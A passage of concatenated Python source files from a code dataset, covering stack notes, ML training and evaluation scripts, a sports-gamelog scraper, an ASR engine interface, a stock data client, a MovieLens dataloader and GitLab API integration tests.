Use the stack!!!\n\n# When we call a subroutine, we need to store the return address somewhere so we\n# know where to go when we hit the \"RET\" instruction.\n\n# CPU's use a stack for this.\n\n# Call will push the address of the instruction after it onto the stack, then move \n# the PC to the subroutine address\n\n# RET will ppo the return address off of the stack, and store it in the PC.\n\n# Use any place you'd use functions in a higher-level language\n\n## DRY principle\n\n# High-level languages eventually use CALL and RET deep down to implement functions.\n\n# The stack is used to store the return address so that we can remember to advance \n# through our PC instead of entering an infinite loop\n\n# Since stacks are first in first out, we can create local variables by pushing \n# more values onto the stack for local variable use, and popping them off one by one\n# until we are left with the final stack pop to return our subroutine\n\n# arguments could be passed to subroutines by adding them as instructions\n\n#_____________________________________________________________\n# beej's notes\n# Subroutines are functions\n# but you can't pass anything in\n# and they cant return anything\n\n\n#----------------------------\n# def foo():\n# print(\"foo 1\")\n\n# return\n\n# def bar():\n# print(\"bar 1\")\n# foo()\n# print(\"bar 2\")\n\n# return\n\n# print(\"main 1\")\n# bar()\n# print(\"main 2\")\n#_______________________________\n\n# The above is a good example of how a CPU keeps track of where they are\n# in a calling process. They assign addresses to different commands.\n\n\n#CALL:\n # push return address on stack. This is the instruction which follows the Call instruction\n # set pc to address of subroutine\n\n# RET:\n # pop the return address value from the stack\n # assign the pc to that value\n\n# When you call:\n # Allocate a stack frame\n # stack frame is the return address and the locals\n\n\n# When you return:\n # Deallocate (pop) that stack frame\n # set the pc to the return address\n\n","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"508638845","text":"\"\"\"\nSome ASNI escape codes for use in terminal output formatting.\nSee https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html\n\"\"\"\n\n# Colors\n_YELLOW = \"\\u001b[33m\"\n\n# Decorations\n_BOLD = \"\\u001b[1m\"\n\n# Aliases\nOK = _BOLD\nRESET = \"\\u001b[0m\"\nWARNING = _YELLOW + _BOLD\n","sub_path":"comparetransactionsets/terminalcolors.py","file_name":"terminalcolors.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559667862","text":"import netCDF4 as nc\nfrom tensorflow import keras\nimport numpy as np\nfrom keras.models import load_model\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\n\n# import mask to define catchment boundaries\nmask = np.load('mask.npy')\nmask_inv = np.invert(mask)\n\n\n# # # PREPROCESS LABELS, UPPER ZONE SOIL MOISTURE # # #\n\n# load label data\nfn = '/home/WUR/keppl001/MScThesis_env/data/outmaps.nc'\nlabel_data = nc.Dataset(fn)\n\n# select labels and apply mask to fill area outside catchment with nan\nsoil_moisture = label_data['ust_0_']\nsoil_moisture = np.ma.filled(soil_moisture, fill_value = np.nan)\nsoil_moisture = np.ma.getdata(soil_moisture)\nsoil_moisture[mask_inv] = np.nan\n\n# loop through dataset to fill values outside catchment with median per timestep\nfor i in np.arange(len(soil_moisture)):\n median = np.nanmedian(soil_moisture[i])\n soil_moisture[i] = np.nan_to_num(soil_moisture[i], copy=False, nan = median)\nlabels = np.expand_dims(soil_moisture, axis = 1)\n\n# define train and validation period\ntrain_window = [0, 11323]\nval_window = [11323, 13514]\n\nlag = 10\n \n# load train and validation features\nfeatures_train = 'PATH'\nfeatures_val = 'PATH' \nfeatures_train = np.load(features_train)\nfeatures_val = np.load(features_val)\n\n# reshape labels to fit shape (BATCH, HEIGHT, WIDTH, CHANNEL)\nlabels_train = labels[train_window[0] + lag:train_window[1]]\nlabels_val = labels[val_window[0] + lag:val_window[1]]\n \nlabels_train = np.reshape(labels_train, (features_train.shape[0], 91, 134, 1))\nlabels_val = np.reshape(labels_val, (features_val.shape[0], 91, 134, 1))\n\n\n# # # MODEL TRAINING # # #\n\n# load S2 model\nmodel = load_model('models/model_stacked_2')\n\n# define optimizer and lr\nopt = keras.optimizers.Adam(learning_rate=0.001)\nmodel.compile(loss = 'mean_squared_error', optimizer = opt, metrics = 'mse')\n\n# add model checkpoints to save model after improvement\nmc = ModelCheckpoint('model_stacked_2.h5', monitor='val_loss', mode='min', save_best_only=True, verbose=1)\nes = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=100)\n\n# train model\nhistory = model.fit(x = features_train, y = labels_train, validation_data = (features_val, labels_val), epochs = 250,\n batch_size = 2, verbose = 2, callbacks=[es, mc], shuffle = False, initial_epoch=29)\n\n# save learning\narray_hist = np.array(list(history.history.values())).transpose()\nnp.save('history_stacked_2.csv', array_hist)","sub_path":"training/runfile_stacked_2.py","file_name":"runfile_stacked_2.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24912075","text":"#!/usr/bin/env python\n\nimport os, sys\nimport collections\nimport numpy as np\nimport cv2\nimport math\nimport random\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport csv\nimport json,pickle\n\nsys.path.insert(0, \"../\")\nimport models\nfrom VideoSpatialPrediction import VideoSpatialPrediction\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0,1,2,3\"\n\ndef softmax(x):\n y = [math.exp(k) for k in x]\n sum_y = math.fsum(y)\n z = [k/sum_y for k in y]\n\n return z\n\ndef def_my_result(spat_prediction,layers = 2,topk = 5):\n sort_order = np.argsort(spat_prediction,axis=0)\n input_img_num_fromsingmp4 = np.argsort(spat_prediction,axis=0).shape[1] #int 250\n pre_result = sort_order[-layers:,:]\n finalpredict = np.reshape(pre_result, (1, input_img_num_fromsingmp4*layers))[0].tolist()\n count = np.zeros(90)\n for i,label in enumerate(finalpredict):\n count[label]=count[label]+1\n final_num = np.sort(count)[-topk:]\n final_label = np.argsort(count)[-topk:]\n return final_label ,final_num\n\ndef write_json(mp4_name,label,score,class_list):\n single_result = []\n single_result.append(mp4_name)\n temp_single_result = []\n for i in range(len(label)):\n temp_single_result.append({\"label\": class_list[label[-i-1]][:-1], \"score\": float('%.6f' % score[-i-1])})\n final_result['results'][mp4_name] = temp_single_result\n\n with open(\"./result.json\", \"w\") as file:\n json.dump(final_result, file)\n file.close()\n\n\n\ndef main():\n\n model_path ='/home/thl/Desktop/challeng/checkpoints/model_best.pth.tar'\n class_name_file = '/home/thl/Desktop/challeng/datasets/settings/class_name.txt'\n class_list = []\n for line in open(class_name_file, \"r\"):\n class_list.append(line)\n\n start_frame = 0\n num_categories = 90\n\n model_start_time = time.time()\n params = torch.load(model_path)\n\n spatial_net = models.rgb_vgg16(pretrained=False, num_classes=90)\n if torch.cuda.is_available():\n spatial_net = torch.nn.DataParallel(spatial_net)\n spatial_net.load_state_dict(params['state_dict'])\n spatial_net.cuda()\n spatial_net.eval()\n model_end_time = time.time()\n model_time = model_end_time - model_start_time\n print(\"Action recognition model is loaded in %4.4f seconds.\" % (model_time))\n\n val_file_dir = '/home/thl/Desktop/challeng/datasets/settings/test_set.txt'\n val_list = []\n for line in open(val_file_dir, \"r\"):\n val_list.append(line)\n\n print(\"we got %d test videos\" % len(val_list))\n\n line_id = 1\n\n result_list = []\n for line in val_list:\n clip_path ='/home/thl/Desktop/challeng/datasets/frame_and_flow/test/'+line[:-1]\n spatial_prediction = VideoSpatialPrediction(\n clip_path,\n spatial_net,\n num_categories,\n start_frame)\n\n final_lab,final_num= def_my_result(spatial_prediction, layers=2)\n # avg_spatial_pred_fc8 = np.mean(spatial_prediction, axis=1)\n final_softmax = softmax(final_num/sum(final_num))\n write_json(line[:-1], final_lab, final_softmax,class_list)\n # result_list.append(avg_spatial_pred_fc8)\n\n # pred_index = np.argmax(avg_spatial_pred_fc8)\n\n # print(final_lab,\" \",final_softmax)\n print_score = [float('%.2f' % final_softmax[0]),float('%.2f' % final_softmax[1]),float('%.2f' % final_softmax[2]),\n float('%.2f' % final_softmax[3]),float('%.2f' % final_softmax[4])]\n\n print(final_lab,print_score, ' ',line_id ,' / ',len(val_list),' video ')\n line_id += 1\n print(len(val_list))\n\n\nif __name__ == \"__main__\":\n final_result = {}\n final_result['results'] = {}\n main()\n\n\n\n\n \n","sub_path":"script/HISTORY/testset_eval.py","file_name":"testset_eval.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"490265033","text":"#!/usr/bin/env python\nimport grequests\nfrom urllib.request import urlopen, Request\nfrom bs4 import BeautifulSoup\nfrom gamelogs import Gamelogs\nfrom export import CSV\nfrom gamelogsurls import GamelogUrls\nfrom parse_to_csv import Parse_To_Csv\n\n\nyear = None\nyear_is_valid = False\ninitial_url = 'https://www.sports-reference.com/cbb/seasons/2019-school-stats.html'\napp_is_running = True\n\nwhile app_is_running:\n \n #simple input validation\n while year_is_valid==False:\n input_value = input('input year or press enter/return to exit: ')\n\n if(input_value==''):\n raise SystemExit\n\n elif input_value.isdigit():\n if not len(input_value)==4:\n print('invalid year')\n continue\n\n elif int(input_value)<2011:\n print('no gamelogs before 2011')\n continue\n else:\n year=int(input_value)\n year_is_valid=True\n break\n else:\n print('not a number')\n continue\n \n \n\n \n \n \n if year_is_valid:\n urls = GamelogUrls(year, initial_url)\n\n url_has_data = True\n data = []\n counter=0\n \n request = (grequests.get(link) for link in urls.get_gamelogs_urls())\n response = grequests.imap(request)\n\n input_choice_is_valid = False\n \n\n while input_choice_is_valid==False:\n input_value = input('fetch gamelogs for {} ONLY? (y/n): '.format(year))\n \n if input_value=='y':\n input_choice_is_valid = True\n print('fetching gamelogs for {} season...'.format(year))\n \n for link in response:\n if link.status_code==200:\n parse = Parse_To_Csv(link.url, year)\n parsed_gamelogs = parse.inputted_year_gamelogs()\n else:\n continue\n \n if parsed_gamelogs:\n csv = CSV(parsed_gamelogs,year)\n csv.generate_csv()\n \n else:\n year_is_valid = False\n raise SystemExit\n \n\n\n\n elif input_value=='n':\n input_choice_is_valid = True\n print('fetching gamelogs since {} season...'.format(year))\n \n for link in response:\n if link.status_code==200:\n parse = Parse_To_Csv(link.url, year)\n parsed_gamelogs = parse.recursive_year_gamelogs()\n else:\n continue\n\n if parsed_gamelogs:\n csv = CSV(parsed_gamelogs,year)\n csv.generate_years_csv()\n \n \n else:\n year_is_valid=False\n raise SystemExit\n \n \n else:\n print('y for yes, n for no... enter year again')\n year_is_valid=False\n break\n \n \n \n \n \n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351180840","text":"\"\"\"Chunk processor engine interface\"\"\"\n\nfrom socket_messages import SocketTranscriptMessage, SocketErrorMessage\n\nclass EngineInterface():\n \"\"\"Interface for chunk processor engines\"\"\"\n def __init__(self, send_message = None):\n self.send_message = send_message\n self.accept_chunks = True\n self.is_open = True\n # Defaults\n self._sample_rate = float(16000)\n self._language = \"\" # \"de-DE\", \"en-US\", etc. (could be: \"de_DE\", \"de\", ...)\n self._asr_model_path = \"\" # model folder relative to: settings.asr_models_folder\n self._continuous_mode = False # send final result once after stop event\n self._optimize_final_result = False # use text processors to optimize final result\n\n async def process(self, chunk: bytes):\n \"\"\"Process chunk\"\"\"\n async def finish_processing(self):\n \"\"\"Block new process requests, wait for last process to finish and send result\"\"\"\n async def close(self):\n \"\"\"Close and clean up\"\"\"\n def get_options(self):\n \"\"\"Return possible options as object (optionally) with defaults\"\"\"\n return {}\n\n async def send_transcript(self,\n transcript, is_final = False, confidence = -1, features = None, alternatives = None):\n \"\"\"Send transcript result\"\"\"\n if self.send_message is not None:\n msg = SocketTranscriptMessage(\n transcript, is_final, confidence, features, alternatives)\n await self.send_message(msg)\n\n async def on_before_close(self):\n \"\"\"Run before close for any required extra action\"\"\"\n self.is_open = False\n\n async def on_error(self, error_message):\n \"\"\"Send error message\"\"\"\n self.accept_chunks = False\n if self.send_message is not None:\n await self.send_message(\n SocketErrorMessage(500, \"AsrEngineError\", error_message))\n","sub_path":"src/engine_interface.py","file_name":"engine_interface.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281720830","text":"# encoding: UTF-8\n\"\"\"\nModule dataclient defines ThanfDataClient.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport asyncio\nimport datetime\nimport ujson\nimport pandas as pd\nimport requests\nimport logging\nfrom . import utils\n\n\nclass ThanfDataClient(object):\n\n def __init__(self, address=\"http://data.thanf.com\"):\n self._address = address\n self._bar_columns = [\n 'symbol',\n 'trade_date',\n 'open',\n 'high',\n 'low',\n 'close',\n 'volume',\n 'turnover',\n 'trade_status']\n self._index_weights_columns = [\n 'trade_date',\n 'symbol',\n 'sec_name',\n 'weight',\n 'index_code']\n self.adj_factor_columns = [\n 'symbol',\n 'trade_date',\n 'adjust_factor']\n self._index_member_columns = [\n 'in_date',\n 'out_date',\n 'symbol'\n ]\n\n @staticmethod\n def _parse_error(content):\n err = eval(content)\n return \"{0},{1}\".format(err.get('error_code'), err.get('error_msg'))\n\n @staticmethod\n def _parse(content):\n try:\n if content.startswith(b\"{'error_code'\"):\n return None, ThanfDataClient._parse_error(content)\n else:\n return ujson.loads(content), None\n except ValueError:\n with open(os.path.join(os.getcwd(), \"error.txt\"), 'wb') as f:\n f.write(content)\n raise\n\n def query_trade_dates(self, start_date, end_date):\n if start_date == \"\":\n start_date = \"20100101\"\n if end_date == \"\":\n end_date = \"{0}1231\".format(datetime.datetime.today().year)\n params = {'start_date': start_date, \"end_date\": end_date}\n r = requests.get(\"{0}/trading_dates\".format(self._address), params)\n dates, err_msg = self._parse(r.content)\n columnset = {\"istradeday\": ['T'] * len(dates), \"trade_date\": dates}\n return utils.to_dataframe(columnset), err_msg\n\n def _get_bar_url(self, symbol, start_date, end_date, ktype, atype):\n url_pattern = \"{0}/get_history_bars?{1}\"\n items = {\n \"order_book_id\": symbol,\n \"start_date\": start_date,\n \"end_date\": end_date,\n \"ktype\": ktype,\n \"atype\": utils.get_atype(atype)\n }\n return url_pattern.format(self._address, utils.dict2url(items))\n\n @staticmethod\n def _get_response_async(urls: list):\n async def get_json(url):\n json = await loop.run_in_executor(None, requests.get, url)\n responses.append(json)\n\n async def run(items: list):\n await asyncio.gather(*[get_json(x) for x in items])\n\n loop = asyncio.new_event_loop()\n responses = []\n for i in utils.chunks(urls, max(len(urls) // 1, 1)):\n loop.run_until_complete(run(i))\n return responses\n\n @staticmethod\n def _get_response(urls: list):\n logging.info('get_response begin')\n responses = []\n with requests.Session() as s:\n for i in urls:\n responses.append(s.get(i))\n logging.info('get_response end')\n return responses\n\n def _parse_bar(self, data: list):\n if len(data) == 0 or len(data[0]) == len(self._bar_columns):\n df = pd.DataFrame(data, columns=self._bar_columns)\n df['trade_status'] = df['trade_status'].apply(lambda x: '停牌' if x != '交易' else x)\n else:\n df = pd.DataFrame(data, columns=self._bar_columns[:-1])\n df['trade_status'] = '交易'\n df['vwap'] = 0\n df.loc[df['volume'] > 0, 'vwap'] = df['turnover']/df['volume']\n return df\n\n def _parse_daily_rsp(self, rsp_list: list):\n logging.info('parse_daily_rsp begin')\n rsp_list = [self._parse(x.content) for x in rsp_list]\n df = pd.DataFrame(columns=self._bar_columns)\n err_msg = None\n for data, err in rsp_list:\n if data is not None:\n df = df.append(self._parse_bar(data), sort=False)\n else:\n err_msg = err\n logging.info('parse_daily_rsp end')\n return df, err_msg\n\n def daily(self, symbol: str, start_date, end_date, adjust_mode=None):\n urls = list(map(\n lambda x: self._get_bar_url(x, start_date, end_date, \"D\", adjust_mode),\n symbol.split(',')))\n\n return self._parse_daily_rsp(self._get_response(urls))\n\n def query_inst_info(self, symbol, fields: list):\n url = '{0}/instruments?order_book_id={1}'.format(self._address, symbol)\n data, err_msg = self._parse(requests.get(url).content)\n return pd.DataFrame(data)[fields], err_msg\n\n def query_index_weights_range(self, index, start_date, end_date):\n args = utils.dict2url({\n 'order_book_id': index,\n 'start_date': start_date,\n 'end_date': end_date})\n url = '{0}/get_index_component_info?{1}'.format(self._address, args)\n data, err_msg = self._parse(requests.get(url).content)\n return pd.DataFrame(data, columns=self._index_weights_columns), err_msg\n\n def _get_adj_factor_url(self, symbol, start_date, end_date):\n url_pattern = \"{0}/get_stock_adjfactor?{1}\"\n items = {\n \"order_book_id\": symbol,\n \"start_date\": start_date,\n \"end_date\": end_date\n }\n return url_pattern.format(self._address, utils.dict2url(items))\n\n def _parse_adj_factor(self, data: list):\n return pd.DataFrame(data, columns=self.adj_factor_columns)\n\n def _parse_adj_factor_rsp(self, rsp_list: list):\n rsp_list = [self._parse(x.content) for x in rsp_list]\n df = pd.DataFrame(columns=self.adj_factor_columns)\n err_msg = None\n for data, err in rsp_list:\n if data is not None:\n df = df.append(self._parse_adj_factor(data))\n else:\n err_msg = err\n\n return df, err_msg\n\n def query_adj_factor(self, symbol, start_date, end_date):\n urls = list(map(\n lambda x: self._get_adj_factor_url(x, start_date, end_date),\n symbol.split(',')))\n return self._parse_adj_factor_rsp(self._get_response(urls))\n\n def query_index_member(self, index, start_date, end_date):\n url_pattern = \"{0}/get_index_component_transfer_info?{1}\"\n args = utils.dict2url({\n 'order_book_id': index,\n 'start_date': start_date,\n 'end_date': end_date})\n\n rsp = requests.get(url_pattern.format(self._address, args))\n data, err_msg = self._parse(rsp.content)\n return pd.DataFrame(data, columns=self._index_member_columns), err_msg\n","sub_path":"jaqs_thanf/dataclient.py","file_name":"dataclient.py","file_ext":"py","file_size_in_byte":6828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223180234","text":"import os\r\nimport numpy as np\r\nfrom data_set import filepaths as fp\r\nimport pandas as pd\r\n\r\nbase_path = fp.Ml_100K.ORGINAL_DIR\r\ntrain_path = os.path.join(base_path,'ua.base')\r\ntest_path = os.path.join(base_path,'ua.test')\r\nuser_path = os.path.join(base_path,'u.user')\r\nitem_path = os.path.join(base_path,'u.item')\r\noccupation_path = os.path.join(base_path,'u.occupation')\r\n\r\n\r\ndef __read_age_index():\r\n age_levels = set()\r\n with open(user_path, 'r') as f:\r\n for line in f.readlines():\r\n d = line.strip().split('|')\r\n age_level = int(d[1])//10\r\n age_levels.add(age_level)\r\n return len(age_levels)\r\n\r\ndef __read_occupation_index(begin):\r\n occupations = {}\r\n with open(occupation_path,'r') as f:\r\n names = f.read().strip().split('\\n')\r\n for name in names:\r\n occupations[name]=begin\r\n begin+=1\r\n return occupations,begin\r\n\r\ndef generate_user_df():\r\n begin = __read_age_index()\r\n gender_dict = { 'M':begin, 'F':begin+1 }\r\n begin += 2\r\n occupation_dict,begin = __read_occupation_index(begin)\r\n uids = []\r\n all_users = []\r\n\r\n with open(user_path,'r') as f:\r\n for line in f.readlines():\r\n user_indexs=[]\r\n d = line.strip().split('|')\r\n age = int(d[1])//10\r\n uids.append(d[0])\r\n user_indexs.append(age)\r\n user_indexs.append(gender_dict[d[2]])\r\n user_indexs.append(occupation_dict[d[3]])\r\n all_users.append(user_indexs)\r\n\r\n df = pd.DataFrame(all_users,index=uids,columns=['age', 'gender', 'occupation'])\r\n df.to_csv(fp.Ml_100K.USER_DF)\r\n return begin\r\n\r\ndef __get_year_index(begin):\r\n years = set()\r\n with open(item_path, 'r', encoding = 'ISO-8859-1') as f:\r\n for line in f.readlines():\r\n d = line.strip().split('|')\r\n year = d[2].split('-')\r\n if len(year)>2:\r\n years.add(int(year[2]))\r\n years.add(0)\r\n years = sorted(years)\r\n print(years)\r\n return {k:v+begin for v,k in enumerate(years)},len(years)\r\n\r\ndef generate_item_df(begin,out):\r\n items = {}\r\n years_dict, begin = __get_year_index(begin)\r\n max_n_neibour = 0\r\n all_items = []\r\n iids = []\r\n with open( item_path, 'r', encoding = 'ISO-8859-1' ) as f:\r\n for line in f.readlines():\r\n item_index = []\r\n d = line.strip().split('|')\r\n iids.append(int(d[0]))\r\n year = d[2].split('-')\r\n if len(year) > 2:\r\n item_index.append(years_dict[int(year[2])])\r\n else:\r\n item_index.append(0)\r\n\r\n subjects = d[5:]\r\n if begin == 0:\r\n begin = len(subjects)\r\n for i in range(len(subjects)):\r\n if int(subjects[i]) == 1:\r\n item_index.append( begin+i )\r\n all_items.append( item_index )\r\n if len(item_index) > max_n_neibour:\r\n max_n_neibour = len(item_index)\r\n n_all=[]\r\n for item in all_items:\r\n n_all.append( np.random.choice( item, size = max_n_neibour, replace = True ) )\r\n\r\n df = pd.DataFrame( n_all, index = iids )\r\n df.to_csv(out )\r\n\r\n #print( all_items, max_n_neibour )\r\n return items\r\n\r\ndef get1or0(r):\r\n return 1.0 if r>3 else 0.0\r\n\r\n\r\ndef __read_rating_data(path):\r\n triples=[]\r\n with open(path,'r') as f:\r\n for line in f.readlines():\r\n d=line.strip().split('\\t')\r\n triples.append([int(d[0]),int(d[1]),get1or0(int(d[2]))])\r\n return triples\r\n\r\ndef read_data_user_item_df():\r\n user_df = pd.read_csv( fp.Ml_100K.USER_DF, index_col = 0 )\r\n item_df = pd.read_csv( fp.Ml_100K.ITEM_DF_0, index_col = 0 )\r\n train_triples = __read_rating_data(train_path)\r\n test_triples= __read_rating_data(test_path)\r\n return train_triples, test_triples, user_df, item_df, max(user_df.max())+1, max(item_df.max())+1\r\n\r\n\r\ndef read_data():\r\n user_df = pd.read_csv( fp.Ml_100K.USER_DF, index_col = 0 )\r\n item_df = pd.read_csv( fp.Ml_100K.ITEM_DF, index_col = 0 )\r\n train_triples = __read_rating_data(train_path)\r\n test_triples= __read_rating_data(test_path)\r\n return train_triples, test_triples, user_df, item_df,max(item_df.max())+1\r\n\r\n\r\nif __name__ == '__main__':\r\n item_df = generate_item_df(0, fp.Ml_100K.ITEM_DF_0)\r\n #print(item_df)\r\n\r\n train_triples, test_triples, user_df, item_df,lenitems = read_data()\r\n print(user_df)\r\n print(item_df)\r\n\r\n","sub_path":"basic_sim/dataloader4ml100kIndexs.py","file_name":"dataloader4ml100kIndexs.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638651199","text":"import csv\nfrom kmpp.pandora_box import PandoraBox\n\npandora_box = PandoraBox()\nmarket_contr = {}\noutput = {}\n\nfile = 'pandora_box.csv'\nwith open(file, 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n total_prod = 0\n for row in csv_reader:\n prod_score = []\n for col in row:\n prod_score.append(float(col))\n pandora_box.insert_score(prod_score) \n total_prod += 1\n# pandora_box.print_box()\n\nk_product = int(input('Masukkan jumlah produk : '))\nprint('Jumlah produk: {}'.format(k_product))\ntime_start, time_end = input('Masukkan waktu awal dan akhir (dipisahkan oleh spasi): ').split()\nprint('Interval waktu: {} - {}'.format(time_start, time_end))\n\n# hitung kontribusi pasar total selama interval waktu\n# asumsi id product integer yang berurutan\nfor i in range(0, total_prod):\n market_contr[i] = pandora_box.get_score(i, int(time_start), int(time_end))\nprint('Market Contribution')\nfor key in market_contr:\n print('{} : {}'.format(key, market_contr[key]))\n\n# sort yang paling besar\nsorted_prod = sorted(market_contr, key=lambda x: (market_contr[x]), reverse=True)\nprint(sorted_prod)\n\n# keluarkan output k teratas\nfor i in range(0, k_product):\n output[sorted_prod[i]] = market_contr[sorted_prod[i]]\n\nprint(output)\n","sub_path":"app/bak/src-rsl/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"256887255","text":"import os\nimport unittest\n\nfrom ogr.services.gitlab import GitlabService\nfrom ogr.persistent_storage import PersistentObjectStorage\n\nDATA_DIR = \"test_data\"\nPERSISTENT_DATA_PREFIX = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), DATA_DIR\n)\n\n\nclass GitlabTests(unittest.TestCase):\n def setUp(self):\n self.token = os.environ.get(\"GITLAB_TOKEN\")\n self.user = os.environ.get(\"GITLAB_USER\")\n test_name = self.id() or \"all\"\n\n persistent_data_file = os.path.join(\n PERSISTENT_DATA_PREFIX, f\"test_gitlab_data_{test_name}.yaml\"\n )\n PersistentObjectStorage().storage_file = persistent_data_file\n\n if PersistentObjectStorage().is_write_mode and (\n not self.user or not self.token\n ):\n raise EnvironmentError(\"please set GITLAB_TOKEN GITLAB_USER env variables\")\n else:\n self.token = \"some_token\"\n\n self.service = GitlabService(\n token=self.token, instance_url=\"https://gitlab.gnome.org\", ssl_verify=True\n )\n\n self.project = self.service.get_project(\n repo=\"testing-ogr-repo\", namespace=\"lbarcziova\"\n )\n\n def tearDown(self):\n PersistentObjectStorage().dump()\n\n\nclass GenericCommands(GitlabTests):\n def test_branches(self):\n branches = self.project.get_branches()\n assert branches\n assert \"master\" in branches\n\n def test_get_file(self):\n file_content = self.project.get_file_content(\"README.md\")\n assert file_content\n assert \"This is new README for testing-ogr-repo\" in file_content\n\n def test_nonexisting_file(self):\n with self.assertRaises(FileNotFoundError):\n self.project.get_file_content(\".blablabla_nonexisting_file\")\n\n def test_username(self):\n # check just lenght, because it is based who regenerated data files\n assert len(self.service.user.get_username()) > 3\n\n def test_email(self):\n email = self.service.user.get_email()\n assert email\n assert len(email) > 3\n assert \"@\" in email\n assert \".\" in email\n\n\nclass Issues(GitlabTests):\n def test_get_issue_list(self):\n issue_list = self.project.get_issue_list()\n assert issue_list\n assert len(issue_list) >= 1\n\n def test_issue_info(self):\n issue_info = self.project.get_issue_info(issue_id=1)\n assert issue_info\n assert issue_info.title.startswith(\"My first issue\")\n assert issue_info.description.startswith(\"This is testing issue\")\n\n def test_get_all_issue_comments(self):\n comments = self.project._get_all_issue_comments(issue_id=2)\n assert comments[0].comment.startswith(\"Comment\")\n assert comments[0].author == \"lbarcziova\"\n assert len(comments) == 2\n\n def test_create_issue(self):\n issue = self.project.create_issue(\n title=\"Issue 2\", description=\"Description for issue 2\"\n )\n assert issue.title == \"Issue 2\"\n assert issue.description == \"Description for issue 2\"\n\n def test_close_issue(self):\n issue = self.project.close_issue(issue_id=1)\n assert issue.status == \"closed\"\n\n\nclass PullRequests(GitlabTests):\n def test_pr_list(self):\n pr_list = self.project.list_pull_requests()\n count = len(pr_list)\n assert pr_list\n assert count >= 1\n assert pr_list[count - 1].title == \"change\"\n\n def test_pr_info(self):\n pr_info = self.project.get_pr_info(pr_id=1)\n assert pr_info\n assert pr_info.title == \"change\"\n assert pr_info.description == \"description of mergerequest\"\n\n def test_get_all_pr_commits(self):\n commits = self.project.get_all_pr_commits(pr_id=1)\n assert commits[0] == \"0709030b613d56752725c33df36041c2b7610506\"\n assert commits[1] == \"f3881188db863e4e053f5a82422f067ac9ba2594\"\n assert len(commits) == 2\n\n def test_get_all_pr_comments(self):\n comments = self.project._get_all_pr_comments(pr_id=1)\n count = len(comments)\n assert comments[count - 1].comment == \"first comment of mergerequest\"\n assert comments[count - 1].author == \"lbarcziova\"\n assert count == 5\n\n def test_update_pr_info(self):\n pr_info = self.project.get_pr_info(pr_id=1)\n original_description = pr_info.description\n\n self.project.update_pr_info(pr_id=1, description=\"changed description\")\n pr_info = self.project.get_pr_info(pr_id=1)\n assert pr_info.description == \"changed description\"\n\n self.project.update_pr_info(pr_id=1, description=original_description)\n pr_info = self.project.get_pr_info(pr_id=1)\n assert pr_info.description == original_description\n\n\nclass Tags(GitlabTests):\n def test_get_tags(self):\n tags = self.project.get_tags()\n count = len(tags)\n assert count >= 2\n assert tags[count - 1].name == \"0.1.0\"\n assert tags[count - 1].commit_sha == \"957d267a5b0cd9e615cd081c0eb02397dce1eb73\"\n\n def test_tag_from_tag_name(self):\n tag = self.project._git_tag_from_tag_name(tag_name=\"0.1.0\")\n assert tag.commit_sha == \"957d267a5b0cd9e615cd081c0eb02397dce1eb73\"\n\n\nclass Releases(GitlabTests):\n def test_create_release(self):\n count_before = len(self.project.get_releases())\n release = self.project.create_release(\n name=\"test\", tag_name=\"0.2.0\", description=\"testing release\", ref=\"master\"\n )\n count_after = len(self.project.get_releases())\n assert release.tag_name == \"0.2.0\"\n assert release.title == \"test\"\n assert release.body == \"testing release\"\n assert count_before + 1 == count_after\n\n def test_get_releases(self):\n releases = self.project.get_releases()\n assert releases\n count = len(releases)\n assert count >= 1\n assert releases[count - 1].title == \"test\"\n assert releases[count - 1].tag_name == \"0.1.0\"\n assert releases[count - 1].body == \"testing release\"\n","sub_path":"tests/integration/test_gitlab.py","file_name":"test_gitlab.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317245171","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndir_paths = [\"model_normal_tremor\", \"model_limits_normal\", \"model_weakness_normal\"]\nfilename = \"monitor.csv\"\nplt.figure()\nfor dir_path in dir_paths:\n print(dir_path)\n reward_arr = [];\n mean_arr = []\n count = 0\n with open(dir_path + \"/\" + filename, 'r') as fin:\n line = fin.readline()\n while line:\n values = line.split(\",\")\n print(values)\n if count >= 2:\n if(dir_path == dir_paths[1]):\n if count % 2 != 0:\n reward_arr.append(float(values[0]))\n mean_arr.append(np.mean(reward_arr[-50:]))\n else:\n reward_arr.append(float(values[0]))\n mean_arr.append(np.mean(reward_arr[-50:]))\n line = fin.readline()\n count += 1\n plt.plot(mean_arr, 